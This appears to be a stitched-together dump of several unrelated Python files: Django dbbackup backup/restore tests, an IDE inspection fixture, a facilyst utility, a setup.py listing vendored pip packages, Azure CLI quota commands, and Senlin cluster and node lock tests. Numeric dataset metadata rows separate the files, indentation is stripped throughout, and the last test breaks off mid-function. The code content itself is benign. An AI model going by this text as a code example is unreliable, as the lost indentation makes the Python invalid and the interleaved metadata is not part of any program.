from dbbackup.tests.testapp import models
@patch('django.conf.settings.DATABASES', {'default': TEST_DATABASE})
@patch('dbbackup.settings.STORAGE', 'dbbackup.tests.utils')
class DbBackupCommandTest(TestCase):
def setUp(self):
HANDLED_FILES.clean()
add_public_gpg()
open(TEST_DATABASE['NAME'], 'a').close()
self.instance = models.CharModel.objects.create(field='foo')
def tearDown(self):
clean_gpg_keys()
def test_encrypt(self):
argv = ['', 'dbbackup', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue(filename.endswith('.gpg'))
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
def test_compress(self):
argv = ['', 'dbbackup', '--compress']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue(filename.endswith('.gz'))
def test_compress_and_encrypt(self):
argv = ['', 'dbbackup', '--compress', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue(filename.endswith('.gz.gpg'))
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
@patch('django.conf.settings.DATABASES', {'default': TEST_DATABASE})
@patch('dbbackup.settings.STORAGE', 'dbbackup.tests.utils')
@patch('dbbackup.management.commands.dbrestore.input', return_value='y')
class DbRestoreCommandTest(TestCase):
def setUp(self):
HANDLED_FILES.clean()
add_public_gpg()
add_private_gpg()
open(TEST_DATABASE['NAME'], 'a').close()
self.instance = models.CharModel.objects.create(field='foo')
def tearDown(self):
clean_gpg_keys()
def test_restore(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup'])
self.instance.delete()
# Restore
execute_from_command_line(['', 'dbrestore'])
restored = models.CharModel.objects.all().exists()
self.assertTrue(restored)
@patch('dbbackup.utils.getpass', return_value=None)
def test_encrypted(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup', '--encrypt'])
self.instance.delete()
# Restore
execute_from_command_line(['', 'dbrestore', '--decrypt'])
restored = models.CharModel.objects.all().exists()
self.assertTrue(restored)
def test_compressed(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup', '--compress'])
self.instance.delete()
# Restore
execute_from_command_line(['', 'dbrestore', '--uncompress'])
def test_no_backup_available(self, *args):
with self.assertRaises(SystemExit):
execute_from_command_line(['', 'dbrestore'])
@patch('dbbackup.utils.getpass', return_value=None)
def test_available_but_not_encrypted(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup'])
# Restore
with self.assertRaises(SystemExit):
execute_from_command_line(['', 'dbrestore', '--decrypt'])
def test_available_but_not_compressed(self, *args):
# Create backup
execute_from_command_line(['', 'dbbackup'])
# Restore
with self.assertRaises(SystemExit):
execute_from_command_line(['', 'dbrestore', '--uncompress'])
@patch('dbbackup.settings.STORAGE', 'dbbackup.tests.utils')
class MediaBackupCommandTest(TestCase):
def setUp(self):
HANDLED_FILES.clean()
add_public_gpg()
def tearDown(self):
clean_gpg_keys()
def test_encrypt(self):
argv = ['', 'mediabackup', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue('.gpg' in filename)
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
def test_no_compress(self):
argv = ['', 'mediabackup', '--no-compress']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertFalse('.gz' in filename)
@patch('dbbackup.utils.getpass', return_value=None)
@patch('dbbackup.management.commands.dbrestore.input', return_value='y')
def test_no_compress_and_encrypted(self, getpass_mock, confirm_mock):
argv = ['', 'mediabackup', '--no-compress', '--encrypt']
execute_from_command_line(argv)
self.assertEqual(1, len(HANDLED_FILES['written_files']))
filename, outputfile = HANDLED_FILES['written_files'][0]
self.assertTrue('.gpg' in filename)
self.assertFalse('.gz' in filename)
# Test file content
outputfile = HANDLED_FILES['written_files'][0][1]
outputfile.seek(0)
self.assertTrue(outputfile.read().startswith(b'-----BEGIN PGP MESSAGE-----'))
# def test_available_but_not_compressed(self, *args):
# # Create backup
# execute_from_command_line(['', 'dbbackup'])
# # Restore
# with self.assertRaises(Exception):
# execute_from_command_line(['', 'dbrestore', '--uncompress'])
| 39.08589
| 85
| 0.645895
| 689
| 6,371
| 5.738752
| 0.155298
| 0.05564
| 0.091047
| 0.11128
| 0.858118
| 0.844208
| 0.816388
| 0.806272
| 0.792109
| 0.638088
| 0
| 0.004785
| 0.212682
| 6,371
| 162
| 86
| 39.32716
| 0.783493
| 0.066081
| 0
| 0.717949
| 0
| 0
| 0.171925
| 0.04876
| 0
| 0
| 0
| 0
| 0.188034
| 1
| 0.153846
| false
| 0.034188
| 0.042735
| 0
| 0.222222
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ab2a26b03a2fe852eacb1d314e1bf98193fe68c3
| 513
|
py
|
Python
|
python/testData/inspections/PyAugmentAssignmentInspection/differentOperations.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2018-12-29T09:53:39.000Z
|
2018-12-29T09:53:42.000Z
|
python/testData/inspections/PyAugmentAssignmentInspection/differentOperations.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 173
|
2018-07-05T13:59:39.000Z
|
2018-08-09T01:12:03.000Z
|
python/testData/inspections/PyAugmentAssignmentInspection/differentOperations.py
|
jnthn/intellij-community
|
8fa7c8a3ace62400c838e0d5926a7be106aa8557
|
[
"Apache-2.0"
] | 2
|
2020-03-15T08:57:37.000Z
|
2020-04-07T04:48:14.000Z
|
# PY-2488
<weak_warning descr="Assignment can be replaced with augmented assignment">a = a ** 1</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x % 3</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x | 3</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x & 3</weak_warning>
<weak_warning descr="Assignment can be replaced with augmented assignment">x = x ^ 3</weak_warning>
| 57
| 100
| 0.77193
| 77
| 513
| 5.012987
| 0.194805
| 0.284974
| 0.207254
| 0.336788
| 0.976684
| 0.976684
| 0.976684
| 0.976684
| 0.976684
| 0.976684
| 0
| 0.020045
| 0.124756
| 513
| 8
| 101
| 64.125
| 0.839644
| 0.013645
| 0
| 0
| 0
| 0
| 0.516899
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0
| null | null | 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 11
|
ab41312a18a7bd0228e5db20d48130827db7562b
| 200
|
py
|
Python
|
facilyst/graphs/utils.py
|
ParthivNaresh/Facilyst
|
786932b0afcf07cd300b2e6ce55ccf7f9e4c49d9
|
[
"MIT"
] | null | null | null |
facilyst/graphs/utils.py
|
ParthivNaresh/Facilyst
|
786932b0afcf07cd300b2e6ce55ccf7f9e4c49d9
|
[
"MIT"
] | 3
|
2022-02-26T17:19:28.000Z
|
2022-03-01T09:34:19.000Z
|
facilyst/graphs/utils.py
|
ParthivNaresh/facilyst
|
786932b0afcf07cd300b2e6ce55ccf7f9e4c49d9
|
[
"MIT"
] | null | null | null |
"""Utility functions for all graphs."""
from facilyst.graphs import GraphBase
from facilyst.utils.gen_utils import _get_subclasses
def _all_graph_data_types():
return _get_subclasses(GraphBase)
| 25
| 52
| 0.81
| 27
| 200
| 5.666667
| 0.666667
| 0.156863
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.115
| 200
| 7
| 53
| 28.571429
| 0.864407
| 0.165
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.5
| 0.25
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
ab4c45b0271d5f557bd0c778aa28b41392adc6e3
| 3,658
|
py
|
Python
|
PacMan/setup.py
|
akshitgoyal/PacMan
|
bc68806169f59118ef9f62af3f14d8e82c692bfd
|
[
"MIT"
] | 1
|
2020-07-21T02:17:58.000Z
|
2020-07-21T02:17:58.000Z
|
PacMan/setup.py
|
akshitgoyal/PacMan
|
bc68806169f59118ef9f62af3f14d8e82c692bfd
|
[
"MIT"
] | null | null | null |
PacMan/setup.py
|
akshitgoyal/PacMan
|
bc68806169f59118ef9f62af3f14d8e82c692bfd
|
[
"MIT"
] | 1
|
2021-07-13T21:21:46.000Z
|
2021-07-13T21:21:46.000Z
|
from setuptools import setup
setup(
name='Pacman',
version='1.1',
packages=['venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.idna',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.pep517',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.pytoml',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.certifi',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.chardet',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.chardet.cli',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.distlib',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.distlib._backport',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.msgpack',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.util',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.contrib',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.contrib._securetransport',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.packages',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.packages.backports',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.urllib3.packages.ssl_match_hostname',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.colorama',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib._trie',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.filters',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.treewalkers',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.treeadapters',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.html5lib.treebuilders',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.lockfile',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.progress',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.requests',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.packaging',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.cachecontrol',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.cachecontrol.caches',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.webencodings',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._vendor.pkg_resources',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.cli',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.req',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.vcs',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.utils',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.models',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.commands',
'venv.Lib.site-packages.pip-19.0.3-py3.5.egg.pip._internal.operations'],
url='',
license='',
author='TheNerds',
author_email='',
description=''
)
| 69.018868
| 108
| 0.631219
| 608
| 3,658
| 3.720395
| 0.108553
| 0.126879
| 0.199381
| 0.344386
| 0.854553
| 0.854553
| 0.854553
| 0.854553
| 0.854553
| 0.854553
| 0
| 0.087679
| 0.176873
| 3,658
| 52
| 109
| 70.346154
| 0.663567
| 0
| 0
| 0
| 0
| 0.803922
| 0.756698
| 0.75205
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.019608
| 0
| 0.019608
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 12
|
ab57de8f68240788175d6f1b17be74b7baf0f3af
| 4,518
|
py
|
Python
|
src/quota/azext_quota/generated/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 1
|
2022-01-25T07:33:18.000Z
|
2022-01-25T07:33:18.000Z
|
src/quota/azext_quota/generated/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 9
|
2022-03-25T19:35:49.000Z
|
2022-03-31T06:09:47.000Z
|
src/quota/azext_quota/generated/custom.py
|
haroonf/azure-cli-extensions
|
61c044d34c224372f186934fa7c9313f1cd3a525
|
[
"MIT"
] | 1
|
2022-03-10T22:13:02.000Z
|
2022-03-10T22:13:02.000Z
|
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
# pylint: disable=too-many-lines
from knack.util import CLIError
from azure.cli.core.util import sdk_no_wait
def quota_usage_list(client,
scope):
return client.list(scope=scope)
def quota_usage_show(client,
resource_name,
scope):
return client.get(resource_name=resource_name,
scope=scope)
def quota_list(client,
scope):
return client.list(scope=scope)
def quota_show(client,
resource_name,
scope):
return client.get(resource_name=resource_name,
scope=scope)
def quota_create(client,
resource_name,
scope,
limit_object=None,
resource_type=None,
properties=None,
no_wait=False):
all_limit = []
if limit_object is not None:
all_limit.append(limit_object)
if len(all_limit) > 1:
raise CLIError('at most one of limit object is needed for limit!')
limit = all_limit[0] if len(all_limit) == 1 else None
create_quota_request = {}
create_quota_request['properties'] = {}
create_quota_request['properties']['limit'] = {}
if limit is not None:
create_quota_request['properties']['limit'] = limit
if properties is not None:
create_quota_request['properties']['properties'] = properties
create_quota_request['properties']['name'] = {}
if resource_name is not None:
create_quota_request['properties']['name']['value'] = resource_name
if len(create_quota_request['properties']['name']) == 0:
del create_quota_request['properties']['name']
if resource_type is not None:
create_quota_request['properties']['resource_type'] = resource_type
return sdk_no_wait(no_wait,
client.begin_create_or_update,
resource_name=resource_name,
scope=scope,
create_quota_request=create_quota_request)
def quota_update(client,
resource_name,
scope,
limit_object=None,
resource_type=None,
properties=None,
no_wait=False):
all_limit = []
if limit_object is not None:
all_limit.append(limit_object)
if len(all_limit) > 1:
raise CLIError('at most one of limit object is needed for limit!')
limit = all_limit[0] if len(all_limit) == 1 else None
create_quota_request = {}
create_quota_request['properties'] = {}
create_quota_request['properties']['limit'] = {}
if limit is not None:
create_quota_request['properties']['limit'] = limit
if properties is not None:
create_quota_request['properties']['properties'] = properties
create_quota_request['properties']['name'] = {}
if resource_name is not None:
create_quota_request['properties']['name']['value'] = resource_name
if len(create_quota_request['properties']['name']) == 0:
del create_quota_request['properties']['name']
if resource_type is not None:
create_quota_request['properties']['resource_type'] = resource_type
return sdk_no_wait(no_wait,
client.begin_update,
resource_name=resource_name,
scope=scope,
create_quota_request=create_quota_request)
def quota_request_status_list(client,
scope,
filter=None,
top=None,
skip_token=None):
return client.list(scope=scope,
filter=filter,
top=top,
skiptoken=skip_token)
def quota_request_status_show(client,
name,
scope):
return client.get(id=name,
scope=scope)
def quota_operation_list(client):
return client.list()
| 35.296875
| 76
| 0.573484
| 490
| 4,518
| 5.042857
| 0.197959
| 0.126265
| 0.174828
| 0.203966
| 0.788345
| 0.759207
| 0.759207
| 0.759207
| 0.759207
| 0.759207
| 0
| 0.002557
| 0.307437
| 4,518
| 127
| 77
| 35.574803
| 0.787152
| 0.104028
| 0
| 0.765306
| 0
| 0
| 0.095616
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.091837
| false
| 0
| 0.020408
| 0.071429
| 0.204082
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
db912081fb1e33730a3938570edc207b8ad95702
| 20,889
|
py
|
Python
|
senlin/tests/unit/db/test_lock_api.py
|
chenyb4/senlin
|
8b9ec31566890dc9989fe08e221172d37c0451b4
|
[
"Apache-2.0"
] | null | null | null |
senlin/tests/unit/db/test_lock_api.py
|
chenyb4/senlin
|
8b9ec31566890dc9989fe08e221172d37c0451b4
|
[
"Apache-2.0"
] | null | null | null |
senlin/tests/unit/db/test_lock_api.py
|
chenyb4/senlin
|
8b9ec31566890dc9989fe08e221172d37c0451b4
|
[
"Apache-2.0"
] | null | null | null |
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from senlin.db.sqlalchemy import api as db_api
from senlin.tests.unit.common import base
from senlin.tests.unit.common import utils
from senlin.tests.unit.db import shared
UUID1 = shared.UUID1
UUID2 = shared.UUID2
UUID3 = shared.UUID3
class DBAPILockTest(base.SenlinTestCase):
def setUp(self):
super(DBAPILockTest, self).setUp()
self.ctx = utils.dummy_context()
self.profile = shared.create_profile(self.ctx)
self.cluster = shared.create_cluster(self.ctx, self.profile)
self.node = shared.create_node(self.ctx, self.cluster, self.profile)
def test_cluster_lock_cluster_scope(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, -1)
self.assertIn(UUID1, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
def test_cluster_lock_node_scope(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, 1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
self.assertEqual(2, len(observed))
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, 1)
self.assertFalse(observed)
def test_cluster_lock_cluster_lock_first(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, -1)
self.assertIn(UUID1, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, 1)
self.assertTrue(observed)
def test_cluster_lock_node_lock_first(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, 1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertIn(UUID1, observed)
self.assertIn(UUID2, observed)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertNotIn(UUID1, observed)
self.assertIn(UUID2, observed)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, -1)
self.assertFalse(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, 1)
self.assertTrue(observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, 1)
self.assertFalse(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, -1)
self.assertIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID3, -1)
self.assertTrue(observed)
def test_cluster_lock_steal(self):
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID1, -1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID2)
self.assertNotIn(UUID1, observed)
self.assertIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID2, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertIn(UUID3, observed)
self.assertNotIn(UUID1, observed)
self.assertNotIn(UUID2, observed)
observed = db_api.cluster_lock_steal(self.cluster.id, UUID1)
self.assertIn(UUID1, observed)
self.assertNotIn(UUID3, observed)
observed = db_api.cluster_lock_release(self.cluster.id, UUID1, -1)
self.assertTrue(observed)
def test_node_lock_acquire_release(self):
observed = db_api.node_lock_acquire(self.node.id, UUID1)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_release(self.node.id, UUID2)
self.assertFalse(observed)
observed = db_api.node_lock_release(self.node.id, UUID1)
self.assertTrue(observed)
observed = db_api.node_lock_release(self.node.id, UUID1)
self.assertFalse(observed)
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
observed = db_api.node_lock_release(self.node.id, UUID2)
self.assertTrue(observed)
def test_node_lock_steal(self):
observed = db_api.node_lock_steal(self.node.id, UUID1)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_release(self.node.id, UUID2)
self.assertFalse(observed)
observed = db_api.node_lock_release(self.node.id, UUID1)
self.assertTrue(observed)
observed = db_api.node_lock_acquire(self.node.id, UUID1)
self.assertEqual(UUID1, observed)
observed = db_api.node_lock_steal(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
observed = db_api.node_lock_release(self.node.id, UUID1)
self.assertFalse(observed)
observed = db_api.node_lock_release(self.node.id, UUID2)
self.assertTrue(observed)
class GCByEngineTest(base.SenlinTestCase):
def setUp(self):
super(GCByEngineTest, self).setUp()
self.ctx = utils.dummy_context()
self.profile = shared.create_profile(self.ctx)
self.cluster = shared.create_cluster(self.ctx, self.profile)
self.node = shared.create_node(self.ctx, self.cluster, self.profile)
def test_delete_cluster_lock(self):
# Test the case that a single cluster-scope clock can be released
#
# (dead-engine) --> Action --> ClusterLock
# |action|owner| |cluster|action|scope|
# | A1 | E1 | |C1 |[A1] |-1 |
# preparation
engine_id = UUID1
action = shared.create_action(self.ctx, target=self.cluster.id,
status='RUNNING', owner=engine_id,
project=self.ctx.project_id)
db_api.cluster_lock_acquire(self.cluster.id, action.id, -1)
# do it
db_api.gc_by_engine(engine_id)
# assertion
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID2, -1)
self.assertIn(UUID2, observed)
self.assertNotIn(action.id, observed)
new_action = db_api.action_get(self.ctx, action.id)
self.assertEqual('FAILED', new_action.status)
self.assertEqual("Engine failure", new_action.status_reason)
def test_delete_cluster_lock_and_node_lock_1(self):
# Test the case that an action is about node that also locked a
# cluster and the cluster lock can be released
#
# (dead-engine) --> Action --> NodeLock
# |action|owner| |node |action|
# | A1 | E1 | |N1 |A1 |
# --> ClusterLock
# |cluster|action|scope|
# |C1 |[A1] |1 |
# preparation
engine_id = UUID1
action = shared.create_action(self.ctx, target=self.node.id,
status='RUNNING', owner=engine_id,
project=self.ctx.project_id)
db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
db_api.node_lock_acquire(self.cluster.id, action.id)
# do it
db_api.gc_by_engine(engine_id)
# assertion
# even a read lock is okay now
observed = db_api.cluster_lock_acquire(self.node.id, UUID2, 1)
self.assertIn(UUID2, observed)
self.assertNotIn(action.id, observed)
# node can be locked again
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
new_action = db_api.action_get(self.ctx, action.id)
self.assertEqual('FAILED', new_action.status)
self.assertEqual("Engine failure", new_action.status_reason)
def test_delete_cluster_lock_and_node_lock_2(self):
# Test the case that an action is about node that also locked a
# cluster and the cluster lock will remain locked
#
# (dead-engine) --> Action --> NodeLock
# |action|owner| |node |action|
# | A1 | E1 | |N1 |A1 |
# --> ClusterLock
# |cluster|action |scope|
# |C1 |[A1, A2]|2 |
# preparation
engine_id = UUID1
action = shared.create_action(self.ctx, target=self.node.id,
status='RUNNING', owner=engine_id,
project=self.ctx.project_id)
db_api.cluster_lock_acquire(self.cluster.id, action.id, 1)
db_api.cluster_lock_acquire(self.cluster.id, UUID2, 1)
db_api.node_lock_acquire(self.node.id, action.id)
# do it
db_api.gc_by_engine(engine_id)
# assertion
# a read lock is okay now and cluster lock state not broken
observed = db_api.cluster_lock_acquire(self.cluster.id, UUID3, 1)
self.assertIn(UUID2, observed)
self.assertIn(UUID3, observed)
self.assertNotIn(action.id, observed)
# node can be locked again
observed = db_api.node_lock_acquire(self.node.id, UUID2)
self.assertEqual(UUID2, observed)
new_action = db_api.action_get(self.ctx, action.id)
self.assertEqual('FAILED', new_action.status)
self.assertEqual("Engine failure", new_action.status_reason)
class DummyGCByEngineTest(base.SenlinTestCase):
def setUp(self):
super(DummyGCByEngineTest, self).setUp()
self.ctx = utils.dummy_context()
self.profile = shared.create_profile(self.ctx)
self.cluster = shared.create_cluster(self.ctx, self.profile)
self.node = shared.create_node(self.ctx, self.cluster, self.profile)
def test_delete_cluster_lock(self):
# Test the case that a single cluster-scope clock can be released
#
# (dead-engine) --> Action --> ClusterLock
# |action|owner| |cluster|action|scope|
# | A1 | E1 | |C1 |[A1] |-1 |
# preparation
engine_id = UUID1
